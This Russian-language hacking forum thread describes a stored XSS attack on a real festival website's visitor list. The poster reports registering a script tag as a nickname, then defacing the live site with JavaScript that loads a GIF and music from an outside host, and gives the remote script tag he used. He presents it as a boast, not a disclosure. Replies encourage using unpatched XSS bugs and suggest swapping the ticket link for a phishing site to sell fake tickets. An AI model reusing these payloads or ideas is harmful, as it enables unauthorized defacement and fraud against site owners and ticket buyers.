• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

<script>alert('Межсайтовый нежданчик')</script>

X-Oleg

8айтовый
WebVoice
Кстати совсем недавно профиксили четыре XSS (Если говорить с Галлереей), не все обновились, можно юзать...

Кто-нить пробовал ?
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Собрался на фестиваль хаосконструктионс, ну и мониторил сайт на предмет билетов и т.д. Покупки билетов не нашел и решил попробовать зарегистрироваться, вдруг после этого появится возможность, только она так и не появилась. Но я обнаружил другое, после регистрации ник пользователя отображался в общем списке на странице: https://chaosconstructions.ru/visitors первым же делом решил попробовать регнуть:
Код:
<script>alert('Hello')</script>
После чего на странице стал вылетать алерт, об этом написал в телеге на канале фестиваля, но за сутки так ничего и не исправили. Сегодня решил сделать красивый дефейс с 8 бит музлом :)

js код простой:
Код:
function S1() {
  
    if (!document.getElementById('webcriminal')){
        document.body.style.backgroundImage = 'url(http://webcriminal.ru/files/getLucky.gif)';
        document.body.style.animation = 'none';
      
        var i = "//webcriminal.ru/files/getLucky-8bit.mp3",
        f = document.createElement("audio");
        f.src = i;
        f.id = "webcriminal";
        f.loop = true;

        f.innerHTML = " <p>If you are reading this, it is because your browser does not support the audio element. We recommend that you get a new browser.</p> <p>";
        document.body.appendChild(f);
        f.play(); 
    }
}

S1();

Запускается функция и она проверяет есть ли на странице элемент с id webcriminal, если нету, то вешает на body гифку:
getLucky.gif


там же блочит анимацию, так как у них стоит смена фона ну и напоследок запускает музычку :)



На данный момент дефейс убрали, но фильтр на поле скорее всего так и не поставили, а это ведь может закончится плохо :)

Ссылка на скрипт:
HTML:
<script src="//webcriminal.ru/files/get_lucky.js"></script>
 

SrDEN

IPv6
Команда форума
WebVoice
Прикольно, я-бы сделал фишинговый сайт и продавал от них биллеты ! :)

Фильтр скорее всего так и не убрали, по этому еще может:

может закончится плохо :)

:websmiles_47:

Большого труда не составит подменить js скриптом ссылку на продажу билетов на фейковый сайт :)
 
Сверху